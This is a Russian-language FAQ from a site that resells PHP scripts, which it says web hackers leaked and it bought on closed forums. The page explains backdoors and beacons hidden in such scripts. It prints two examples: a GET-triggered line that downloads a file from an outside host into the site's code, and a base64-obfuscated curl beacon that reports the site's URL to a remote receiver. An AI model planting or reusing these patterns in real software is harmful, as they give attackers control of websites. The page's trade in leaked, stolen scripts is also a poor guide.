Часто Задаваемые Вопросы

FAQ



Такой маркетинговый план нашего сайта. Многие скрипты на нашем ресурсе стоят 1-5 тыс руб — но к сожалению за эту цену мы будем продавать их год!


В данном раздели мы выкладываем скрипты для мотивации пользователей заходить на сайт


Мы покупаем скрипты на закрытых форумах. Скрипты как правило слиты web хакерами (например с магазинов скриптов и.т.д)


Нет не какого подвоха! Так как цена минимальная — нам выгодно что-бы были постоянные покупатели. Мы проверяем скрипты на уязвимости, шеллы, стучалки, бэкдоры — двумя программами ( если есть подозрения — проверяем в ручную ) + плюс у нас есть услуга дополнительной защиты и ручной проверки скрипта Смотрите раздел — Услуги


Это ошибка программиста или специально оставленная хакером (дыра) для взлома вашего сайта. Схема такая: Оставляют бэкдор + стучалку в популярном скрипте и выкидывают его в паблик. После того как вы скачаете и установите скрипт (стучалка) оповестит автора о домене и соответственно через оставленную дыру вам зальют web shell и получат полный доступ ко всем вашим сайтом на хостинге


Мы часто наталкиваемся на зловредный код в скриптах и узнаём уже их авторов по почерку
Пример бэкдора:
if( isset( $_GET['a'] ) && $_GET['a'] == 'd' ){
file_put_contents('core/classes/mail_server.php',file_get_contents('http://host1731685.hostland.pro/mail_server.txt'));}


if( isset( $_GET['a'] ) && 
$url = base64_decode('aHR0cA==').(!empty($_SERVER[base64_decode('SFRUUFM=')])?base64_decode('cw=='):'').
base64_decode('Oi8v').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL2JrLnNlY3VyaXR5ZnVzZS5jb20vcmVjZWl2ZXIucGhw'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]);
$html = curl_exec($ch);


Скачайте — Сканер AI-BOLIT для Windows 7,8,10 — Есть постоянное обновление, находит большинство уязвимостей. Есть ещё программы (платно) Но лучше проверять скрипты в ручную


Пример: Данный сайт стоит на движке WordPress — если просканировать его тем-же Айболитом он покажет от 30 уязвимостей! Даже в самом дырявом скрипте хайпа или фермы их редко больше 15. Естественно WordPress самый популярный движок для сайтов и его так просто не взломать. Если антивирус что-то нашёл это как правило не критично. Если даже и есть уязвимость, то раскрутить её сможет человек плотно знающий язык php. Но я не думаю что ему есть дело до ваших 300руб на PAYEER. Больше следует обращать внимание на стучалки, бэкдоры


У вас вынесли кассу ? ( 800р ) Не спишите звонить в киберполицию и отвлекать много уважаемых людей от важных дел. Сносить сайт тоже не надо! Надо сделать дамп сайта. Если сайт не один и вы не перекрыли доступ — заражены все сайты. Далее смотрим логи на хостинге — надо выяснить какие действия совершал негодяй который вас взломал. Выяснить где же ДЫРА. Любой антивирус на хостинге найдёт шелла. Удалить его и посмотреть по логам как загружается злоумышленник. Далее сносить абсолютно все сайты и проверять скрипты на шеллы, бэкдоры Данную услугу вы сможете заказать у нас на сайте.

Остались вопросы ? Пишите в комментариях.

Оставить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *